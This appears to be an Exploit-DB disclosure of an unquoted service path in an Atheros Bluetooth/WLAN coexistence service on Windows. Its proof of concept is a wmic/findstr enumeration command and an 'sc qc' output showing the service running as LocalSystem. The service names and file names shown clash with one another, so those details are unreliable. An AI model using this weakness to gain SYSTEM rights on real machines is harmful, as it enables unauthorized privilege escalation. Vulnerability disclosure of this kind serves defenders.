Atheros Coex Service Application 8.0.0.255 - 'ZAtheros Bt&Wlan Coex Agent' Unquoted Service Path

EDB-ID:

49053

CVE:

N/A




Platform:

Windows

Date:

2020-11-16


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

#Exploit Title: Atheros Coex Service Application 8.0.0.255 -'ZAtheros Bt&Wlan Coex Agent' Unquoted Service Path
#Exploit Author : Isabel Lopez
#Exploit Date: 2020-11-13
#Vendor Homepage : https://www.file.net/process/ath_coexagent.exe.html
#Link Software : https://www.boostbyreason.com/resource-file-9102-ath_coexagent-exe.aspx
#Tested on OS: Windows 8.1 (64bits)


# 1. Description
# Atheros Coex Service Application 8.0.0.255 has an unquoted service path.

# 2. PoC

C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /V "C:\Windows" | findstr /i /V """"

ZAtheros Bt&Wlan Coex Agent	ZAtheros Bt&Wlan Coex Agent	C:\Program Files (x86)\Bluethooth Suite\Aht_CoexAgent.exe    Auto

C:\>sc qc WCAssistantService
[SC] QueryServiceConfig SUCCES

SERVICE_NAME: WCAssistantService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Bluethooth Suite\Aht_CoexAgent.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : ZAtheros Bt&Wlan Coex Agent
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem